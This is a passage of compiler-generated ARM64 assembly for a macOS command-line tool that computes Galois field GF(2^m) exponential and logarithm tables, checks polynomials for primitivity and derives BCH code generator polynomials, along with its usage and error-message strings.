adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
ldur x8, [x29, #-16]
mov x9, sp
str x8, [x9]
adrp x1, l_.str.12@PAGE
add x1, x1, l_.str.12@PAGEOFF
bl _fprintf
mov w8, #-1
stur w8, [x29, #-4]
b LBB3_21
LBB3_17: ; in Loop: Header=BB3_6 Depth=1
b LBB3_18
LBB3_18: ; in Loop: Header=BB3_6 Depth=1
b LBB3_19
LBB3_19: ; in Loop: Header=BB3_6 Depth=1
b LBB3_6
LBB3_20:
ldr x8, [sp, #16]
ldr x9, [sp, #24]
str x8, [x9]
stur wzr, [x29, #-4]
b LBB3_21
LBB3_21:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function gf_init
_gf_init: ; @gf_init
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-16]
ldur x0, [x29, #-16]
bl _degree
stur w0, [x29, #-20]
ldur w9, [x29, #-20]
mov w8, #1
lsl w8, w8, w9
str w8, [sp, #24]
mov x8, #1
str x8, [sp, #16]
ldursw x8, [x29, #-20]
subs x8, x8, #16
cset w8, ls
tbnz w8, #0, LBB4_2
b LBB4_1
LBB4_1:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.13@PAGE
add x1, x1, l_.str.13@PAGEOFF
bl _fprintf
mov w8, #-1
stur w8, [x29, #-4]
b LBB4_11
LBB4_2:
ldr w8, [sp, #24]
subs w8, w8, #1
adrp x9, _gf_order@PAGE
strh w8, [x9, _gf_order@PAGEOFF]
ldur w8, [x29, #-20]
adrp x9, _gf_degree@PAGE
strh w8, [x9, _gf_degree@PAGEOFF]
ldr w8, [sp, #24]
lsl w9, w8, #1
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
lsl x0, x8, #1
bl _malloc
adrp x8, _gf_exp@PAGE
str x0, [x8, _gf_exp@PAGEOFF]
ldr x8, [x8, _gf_exp@PAGEOFF]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB4_4
b LBB4_3
LBB4_3:
adrp x0, l_.str.14@PAGE
add x0, x0, l_.str.14@PAGEOFF
bl _perror
mov w8, #-1
stur w8, [x29, #-4]
b LBB4_11
LBB4_4:
adrp x8, _gf_exp@PAGE
ldr x8, [x8, _gf_exp@PAGEOFF]
ldrsw x9, [sp, #24]
add x8, x8, x9, lsl #1
adrp x9, _gf_log@PAGE
str x8, [x9, _gf_log@PAGEOFF]
str wzr, [sp, #12]
b LBB4_5
LBB4_5: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldr w9, [sp, #24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB4_10
b LBB4_6
LBB4_6: ; in Loop: Header=BB4_5 Depth=1
ldr x8, [sp, #16]
adrp x9, _gf_exp@PAGE
ldr x9, [x9, _gf_exp@PAGEOFF]
ldrsw x10, [sp, #12]
; kill: def $w8 killed $w8 killed $x8
strh w8, [x9, x10, lsl #1]
ldr w8, [sp, #12]
adrp x9, _gf_log@PAGE
ldr x9, [x9, _gf_log@PAGEOFF]
ldr x10, [sp, #16]
strh w8, [x9, x10, lsl #1]
ldr x8, [sp, #16]
lsl x8, x8, #1
str x8, [sp, #16]
ldr x8, [sp, #16]
ldur w9, [x29, #-20]
; kill: def $x9 killed $w9
lsr x8, x8, x9
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_8
b LBB4_7
LBB4_7: ; in Loop: Header=BB4_5 Depth=1
ldur x9, [x29, #-16]
ldr x8, [sp, #16]
eor x8, x8, x9
str x8, [sp, #16]
b LBB4_8
LBB4_8: ; in Loop: Header=BB4_5 Depth=1
b LBB4_9
LBB4_9: ; in Loop: Header=BB4_5 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB4_5
LBB4_10:
stur wzr, [x29, #-4]
b LBB4_11
LBB4_11:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function gf_dump
_gf_dump: ; @gf_dump
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str x0, [sp, #32]
adrp x8, _gf_degree@PAGE
ldrh w10, [x8, _gf_degree@PAGEOFF]
mov w9, #1
lsl w9, w9, w10
str w9, [sp, #28]
ldrh w8, [x8, _gf_degree@PAGEOFF]
add w8, w8, #3
asr w8, w8, #2
str w8, [sp, #24]
ldr w8, [sp, #24]
add w9, w8, #5
mov w8, #72
sdiv w8, w8, w9
str w8, [sp, #20]
ldr w9, [sp, #24]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
sub x0, x29, #24
mov x3, #16
mov x1, x3
mov w2, #0
adrp x4, l_.str.15@PAGE
add x4, x4, l_.str.15@PAGEOFF
bl ___snprintf_chk
str wzr, [sp, #16]
b LBB5_1
LBB5_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #16]
ldr w9, [sp, #28]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_8
b LBB5_2
LBB5_2: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #16]
ldr w10, [sp, #20]
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB5_4
b LBB5_3
LBB5_3: ; in Loop: Header=BB5_1 Depth=1
adrp x0, l_.str.16@PAGE
add x0, x0, l_.str.16@PAGEOFF
bl _printf
b LBB5_4
LBB5_4: ; in Loop: Header=BB5_1 Depth=1
ldr x8, [sp, #32]
ldrsw x9, [sp, #16]
ldrh w10, [x8, x9, lsl #1]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
sub x0, x29, #24
bl _printf
ldr w8, [sp, #16]
add w8, w8, #1
ldr w10, [sp, #20]
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB5_6
b LBB5_5
LBB5_5: ; in Loop: Header=BB5_1 Depth=1
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
b LBB5_6
LBB5_6: ; in Loop: Header=BB5_1 Depth=1
b LBB5_7
LBB5_7: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB5_1
LBB5_8:
ldr w8, [sp, #16]
ldr w10, [sp, #20]
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB5_10
b LBB5_9
LBB5_9:
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
b LBB5_10
LBB5_10:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB5_12
b LBB5_11
LBB5_11:
bl ___stack_chk_fail
LBB5_12:
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function bch_generator
_bch_generator: ; @bch_generator
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sturh w0, [x29, #-6]
stur x1, [x29, #-16]
adrp x8, _gf_degree@PAGE
ldrh w9, [x8, _gf_degree@PAGEOFF]
mov w8, #1
add w9, w9, #1
lsl w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x0, w8
bl _bit_memsz
stur x0, [x29, #-24]
mov x8, #1
str x8, [sp, #40]
ldurh w8, [x29, #-6]
adrp x9, _gf_order@PAGE
ldrh w9, [x9, _gf_order@PAGEOFF]
subs w8, w8, w9
cset w8, lt
tbnz w8, #0, LBB6_2
b LBB6_1
LBB6_1:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.17@PAGE
add x1, x1, l_.str.17@PAGEOFF
bl _fprintf
mov w8, #-1
stur w8, [x29, #-4]
b LBB6_16
LBB6_2:
ldur x0, [x29, #-24]
bl _malloc
stur x0, [x29, #-32]
ldur x8, [x29, #-32]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB6_4
b LBB6_3
LBB6_3:
adrp x0, l_.str.18@PAGE
add x0, x0, l_.str.18@PAGEOFF
bl _perror
mov w8, #-1
stur w8, [x29, #-4]
b LBB6_16
LBB6_4:
ldur x0, [x29, #-32]
ldur x2, [x29, #-24]
mov w1, #0
mov x3, #-1
bl ___memset_chk
ldurh w10, [x29, #-6]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.19@PAGE
add x0, x0, l_.str.19@PAGEOFF
bl _printf
mov w8, #1
strh w8, [sp, #38]
b LBB6_5
LBB6_5: ; =>This Inner Loop Header: Depth=1
ldrh w8, [sp, #38]
ldurh w9, [x29, #-6]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB6_13
b LBB6_6
LBB6_6: ; in Loop: Header=BB6_5 Depth=1
adrp x8, _gf_exp@PAGE
ldr x8, [x8, _gf_exp@PAGEOFF]
ldrh w9, [sp, #38]
; kill: def $x9 killed $w9
ldrh w0, [x8, x9, lsl #1]
bl _minimal
; implicit-def: $x8
mov x8, x0
and x8, x8, #0xffff
str x8, [sp, #24]
ldrh w10, [sp, #38]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.20@PAGE
add x0, x0, l_.str.20@PAGEOFF
bl _printf
ldr x1, [sp, #24]
mov w0, #120
bl _print_poly
ldur x0, [x29, #-32]
ldr x1, [sp, #24]
bl _bit_test
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB6_10
b LBB6_7
LBB6_7: ; in Loop: Header=BB6_5 Depth=1
ldr x0, [sp, #24]
bl _degree
str w0, [sp, #20] ; 4-byte Folded Spill
ldr x0, [sp, #40]
bl _degree
mov x8, x0
ldr w0, [sp, #20] ; 4-byte Folded Reload
add w9, w0, w8
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
subs x8, x8, #63
cset w8, ls
tbnz w8, #0, LBB6_9
b LBB6_8
LBB6_8:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.21@PAGE
add x1, x1, l_.str.21@PAGEOFF
bl _fprintf
mov w8, #-1
stur w8, [x29, #-4]
b LBB6_16
LBB6_9: ; in Loop: Header=BB6_5 Depth=1
ldr x0, [sp, #40]
ldr x1, [sp, #24]
bl _mul_poly
str x0, [sp, #40]
ldur x0, [x29, #-32]
ldr x1, [sp, #24]
bl _bit_set
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
b LBB6_11
LBB6_10: ; in Loop: Header=BB6_5 Depth=1
adrp x0, l_.str.22@PAGE
add x0, x0, l_.str.22@PAGEOFF
bl _printf
b LBB6_11
LBB6_11: ; in Loop: Header=BB6_5 Depth=1
b LBB6_12
LBB6_12: ; in Loop: Header=BB6_5 Depth=1
ldrh w8, [sp, #38]
add w8, w8, #2
strh w8, [sp, #38]
b LBB6_5
LBB6_13:
adrp x0, l_.str.23@PAGE
add x0, x0, l_.str.23@PAGEOFF
bl _printf
ldr x1, [sp, #40]
mov w0, #120
bl _print_poly
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
ldur x8, [x29, #-16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB6_15
b LBB6_14
LBB6_14:
ldr x8, [sp, #40]
ldur x9, [x29, #-16]
str x8, [x9]
b LBB6_15
LBB6_15:
ldur x0, [x29, #-32]
bl _free
stur wzr, [x29, #-4]
b LBB6_16
LBB6_16:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function gf_exit
_gf_exit: ; @gf_exit
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _gf_exp@PAGE
ldr x0, [x8, _gf_exp@PAGEOFF]
bl _free
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function is_primitive
_is_primitive: ; @is_primitive
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
ldur x0, [x29, #-8]
bl _degree
stur w0, [x29, #-12]
ldur w9, [x29, #-12]
mov w8, #1
lsl w8, w8, w9
subs w8, w8, #1
stur w8, [x29, #-16]
mov x8, #1
str x8, [sp, #24]
str wzr, [sp, #12]
b LBB8_1
LBB8_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB8_6
b LBB8_2
LBB8_2: ; in Loop: Header=BB8_1 Depth=1
ldr x8, [sp, #24]
lsl x8, x8, #1
str x8, [sp, #24]
ldr x8, [sp, #24]
ldur w9, [x29, #-12]
; kill: def $x9 killed $w9
lsr x8, x8, x9
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB8_4
b LBB8_3
LBB8_3: ; in Loop: Header=BB8_1 Depth=1
ldur x9, [x29, #-8]
ldr x8, [sp, #24]
eor x8, x8, x9
str x8, [sp, #24]
b LBB8_4
LBB8_4: ; in Loop: Header=BB8_1 Depth=1
b LBB8_5
LBB8_5: ; in Loop: Header=BB8_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB8_1
LBB8_6:
ldr x8, [sp, #24]
str x8, [sp, #16]
str wzr, [sp, #12]
b LBB8_7
LBB8_7: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #24]
lsl x8, x8, #1
str x8, [sp, #24]
ldr x8, [sp, #24]
ldur w9, [x29, #-12]
; kill: def $x9 killed $w9
lsr x8, x8, x9
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB8_9
b LBB8_8
LBB8_8: ; in Loop: Header=BB8_7 Depth=1
ldur x9, [x29, #-8]
ldr x8, [sp, #24]
eor x8, x8, x9
str x8, [sp, #24]
b LBB8_9
LBB8_9: ; in Loop: Header=BB8_7 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB8_10
LBB8_10: ; in Loop: Header=BB8_7 Depth=1
ldr x8, [sp, #24]
ldr x9, [sp, #16]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB8_7
b LBB8_11
LBB8_11:
ldr w8, [sp, #12]
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, eq
and w0, w8, #0x1
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function print_poly
_print_poly: ; @print_poly
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sturb w0, [x29, #-1]
stur x1, [x29, #-16]
stur wzr, [x29, #-20]
ldur x8, [x29, #-16]
str x8, [sp, #16] ; 8-byte Folded Spill
ldur x0, [x29, #-16]
bl _reciprocal
ldr x9, [sp, #16] ; 8-byte Folded Reload
mov x8, sp
str x9, [x8]
str x0, [x8, #8]
adrp x0, l_.str.7@PAGE
add x0, x0, l_.str.7@PAGEOFF
bl _printf
mov w8, #63
str w8, [sp, #24]
b LBB9_1
LBB9_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #24]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB9_14
b LBB9_2
LBB9_2: ; in Loop: Header=BB9_1 Depth=1
ldur x8, [x29, #-16]
ldr w9, [sp, #24]
; kill: def $x9 killed $w9
lsr x8, x8, x9
ands x8, x8, #0x1
cset w8, ne
tbnz w8, #0, LBB9_4
b LBB9_3
LBB9_3: ; in Loop: Header=BB9_1 Depth=1
b LBB9_13
LBB9_4: ; in Loop: Header=BB9_1 Depth=1
ldur w8, [x29, #-20]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB9_6
b LBB9_5
LBB9_5: ; in Loop: Header=BB9_1 Depth=1
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
bl _printf
b LBB9_6
LBB9_6: ; in Loop: Header=BB9_1 Depth=1
ldr w8, [sp, #24]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB9_8
b LBB9_7
LBB9_7: ; in Loop: Header=BB9_1 Depth=1
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
bl _printf
b LBB9_12
LBB9_8: ; in Loop: Header=BB9_1 Depth=1
ldr w8, [sp, #24]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB9_10
b LBB9_9
LBB9_9: ; in Loop: Header=BB9_1 Depth=1
ldursb w10, [x29, #-1]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.10@PAGE
add x0, x0, l_.str.10@PAGEOFF
bl _printf
b LBB9_11
LBB9_10: ; in Loop: Header=BB9_1 Depth=1
ldursb w11, [x29, #-1]
ldr w9, [sp, #24]
; implicit-def: $x8
mov x8, x9
mov x9, sp
; implicit-def: $x10
mov x10, x11
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.11@PAGE
add x0, x0, l_.str.11@PAGEOFF
bl _printf
b LBB9_11
LBB9_11: ; in Loop: Header=BB9_1 Depth=1
b LBB9_12
LBB9_12: ; in Loop: Header=BB9_1 Depth=1
mov w8, #1
stur w8, [x29, #-20]
b LBB9_13
LBB9_13: ; in Loop: Header=BB9_1 Depth=1
ldr w8, [sp, #24]
subs w8, w8, #1
str w8, [sp, #24]
b LBB9_1
LBB9_14:
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function degree
_degree: ; @degree
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
str wzr, [sp, #4]
b LBB10_1
LBB10_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
subs x8, x8, #1
cset w8, ls
tbnz w8, #0, LBB10_3
b LBB10_2
LBB10_2: ; in Loop: Header=BB10_1 Depth=1
ldr x8, [sp, #8]
lsr x8, x8, #1
str x8, [sp, #8]
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB10_1
LBB10_3:
ldr w0, [sp, #4]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function reciprocal
_reciprocal: ; @reciprocal
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
str xzr, [sp]
b LBB11_1
LBB11_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB11_3
b LBB11_2
LBB11_2: ; in Loop: Header=BB11_1 Depth=1
ldr x8, [sp]
lsl x8, x8, #1
str x8, [sp]
ldr x8, [sp, #8]
and x9, x8, #0x1
ldr x8, [sp]
orr x8, x8, x9
str x8, [sp]
ldr x8, [sp, #8]
lsr x8, x8, #1
str x8, [sp, #8]
b LBB11_1
LBB11_3:
ldr x0, [sp]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function bit_memsz
_bit_memsz: ; @bit_memsz
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
ldr x8, [sp, #8]
add x8, x8, #7
lsr x0, x8, #3
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function minimal
_minimal: ; @minimal
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sturh w0, [x29, #-2]
mov x8, #1
str x8, [sp]
b LBB13_1
LBB13_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp]
adrp x9, _gf_degree@PAGE
ldrh w9, [x9, _gf_degree@PAGEOFF]
; kill: def $x9 killed $w9
lsr x8, x8, x9
subs x8, x8, #1
cset w8, hi
tbnz w8, #0, LBB13_6
b LBB13_2
LBB13_2: ; in Loop: Header=BB13_1 Depth=1
ldr x0, [sp]
ldurh w1, [x29, #-2]
bl _eval_poly
ands w8, w0, #0xffff
cset w8, ne
tbnz w8, #0, LBB13_4
b LBB13_3
LBB13_3:
b LBB13_6
LBB13_4: ; in Loop: Header=BB13_1 Depth=1
b LBB13_5
LBB13_5: ; in Loop: Header=BB13_1 Depth=1
ldr x8, [sp]
add x8, x8, #1
str x8, [sp]
b LBB13_1
LBB13_6:
ldr x8, [sp]
; kill: def $w8 killed $w8 killed $x8
and w0, w8, #0xffff
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function bit_test
_bit_test: ; @bit_test
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str x1, [sp, #16]
ldr x8, [sp, #16]
and x8, x8, #0x7
mov x9, x8
mov w8, #1
lsl w8, w8, w9
strb w8, [sp, #15]
ldr x8, [sp, #16]
lsr x8, x8, #3
str x8, [sp]
ldr x8, [sp, #24]
ldr x9, [sp]
ldrb w8, [x8, x9]
ldrb w9, [sp, #15]
and w0, w8, w9
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function mul_poly
_mul_poly: ; @mul_poly
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str x1, [sp, #16]
str xzr, [sp, #8]
b LBB15_1
LBB15_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB15_5
b LBB15_2
LBB15_2: ; in Loop: Header=BB15_1 Depth=1
ldr x8, [sp, #24]
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB15_4
b LBB15_3
LBB15_3: ; in Loop: Header=BB15_1 Depth=1
ldr x9, [sp, #16]
ldr x8, [sp, #8]
eor x8, x8, x9
str x8, [sp, #8]
b LBB15_4
LBB15_4: ; in Loop: Header=BB15_1 Depth=1
ldr x8, [sp, #24]
lsr x8, x8, #1
str x8, [sp, #24]
ldr x8, [sp, #16]
lsl x8, x8, #1
str x8, [sp, #16]
b LBB15_1
LBB15_5:
ldr x0, [sp, #8]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function bit_set
_bit_set: ; @bit_set
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str x1, [sp, #16]
ldr x8, [sp, #16]
and x8, x8, #0x7
mov x9, x8
mov w8, #1
lsl w8, w8, w9
strb w8, [sp, #15]
ldr x8, [sp, #16]
lsr x8, x8, #3
str x8, [sp]
ldrb w10, [sp, #15]
ldr x8, [sp, #24]
ldr x9, [sp]
add x9, x8, x9
ldrb w8, [x9]
orr w8, w8, w10
strb w8, [x9]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function eval_poly
_eval_poly: ; @eval_poly
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
strh w1, [sp, #6]
adrp x8, _gf_log@PAGE
ldr x8, [x8, _gf_log@PAGEOFF]
ldrh w9, [sp, #6]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #1
ldrh w8, [x8]
strh w8, [sp, #4]
strh wzr, [sp, #2]
mov w8, #1
strh w8, [sp]
ldr x0, [sp, #8]
bl _reciprocal
str x0, [sp, #8]
b LBB17_1
LBB17_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB17_5
b LBB17_2
LBB17_2: ; in Loop: Header=BB17_1 Depth=1
ldr x8, [sp, #8]
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB17_4
b LBB17_3
LBB17_3: ; in Loop: Header=BB17_1 Depth=1
adrp x8, _gf_exp@PAGE
ldr x8, [x8, _gf_exp@PAGEOFF]
ldrh w9, [sp]
; kill: def $x9 killed $w9
ldrh w9, [x8, x9, lsl #1]
ldrh w8, [sp, #2]
eor w8, w8, w9
strh w8, [sp, #2]
b LBB17_4
LBB17_4: ; in Loop: Header=BB17_1 Depth=1
ldr x8, [sp, #8]
lsr x8, x8, #1
str x8, [sp, #8]
ldrh w8, [sp]
ldrh w9, [sp, #4]
add w8, w8, w9
and w0, w8, #0xffff
bl _mod_s
strh w0, [sp]
b LBB17_1
LBB17_5:
ldrh w0, [sp, #2]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function mod_s
_mod_s: ; @mod_s
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
strh w0, [sp, #14]
ldrh w8, [sp, #14]
adrp x9, _gf_order@PAGE
ldrh w9, [x9, _gf_order@PAGEOFF]
subs w8, w8, w9
cset w8, lt
tbnz w8, #0, LBB18_2
b LBB18_1
LBB18_1:
ldrh w8, [sp, #14]
adrp x9, _gf_order@PAGE
ldrh w9, [x9, _gf_order@PAGEOFF]
subs w8, w8, w9
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB18_3
LBB18_2:
ldrh w8, [sp, #14]
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB18_3
LBB18_3:
ldr w8, [sp, #8] ; 4-byte Folded Reload
and w0, w8, #0xffff
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "search"
l_.str.1: ; @.str.1
.asciz "exp"
.zerofill __DATA,__bss,_gf_exp,8,3 ; @gf_exp
l_.str.2: ; @.str.2
.asciz "log"
.zerofill __DATA,__bss,_gf_log,8,3 ; @gf_log
l_.str.3: ; @.str.3
.asciz "bch"
l_.str.4: ; @.str.4
.asciz "unknown operation: %s\n"
l_.str.5: ; @.str.5
.asciz "usage:\n %s search <degree>\n Search for primitive polynomials.\n %s <generator> exp\n Print GF(2^m) exponential table.\n %s <generator> log\n Print GF(2^m) logarithm table.\n %s <generator> bch <syndrome count>\n Find roots and product BCH generator.\n"
l_.str.6: ; @.str.6
.asciz "\n"
l_.str.7: ; @.str.7
.asciz "0x%lx [0x%lx] -> "
l_.str.8: ; @.str.8
.asciz " + "
l_.str.9: ; @.str.9
.asciz "1"
l_.str.10: ; @.str.10
.asciz "%c"
l_.str.11: ; @.str.11
.asciz "%c^%d"
l_.str.12: ; @.str.12
.asciz "parse_poly: invalid character: %s\n"
l_.str.13: ; @.str.13
.asciz "gf_init: generator degree out of bounds\n"
.zerofill __DATA,__bss,_gf_order,2,1 ; @gf_order
.zerofill __DATA,__bss,_gf_degree,2,1 ; @gf_degree
l_.str.14: ; @.str.14
.asciz "gf_init: malloc"
l_.str.15: ; @.str.15
.asciz "0x%%0%dx,"
l_.str.16: ; @.str.16
.asciz " "
l_.str.17: ; @.str.17
.asciz "bch_generator: syndrome count out of bounds\n"
l_.str.18: ; @.str.18
.asciz "bch_generator: malloc"
l_.str.19: ; @.str.19
.asciz "BCH generator, %d roots:\n"
l_.str.20: ; @.str.20
.asciz " min(alpha^%d): "
l_.str.21: ; @.str.21
.asciz "bch_generator: overflow\n"
l_.str.22: ; @.str.22
.asciz " [dup]\n"
l_.str.23: ; @.str.23
.asciz " generator: "
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
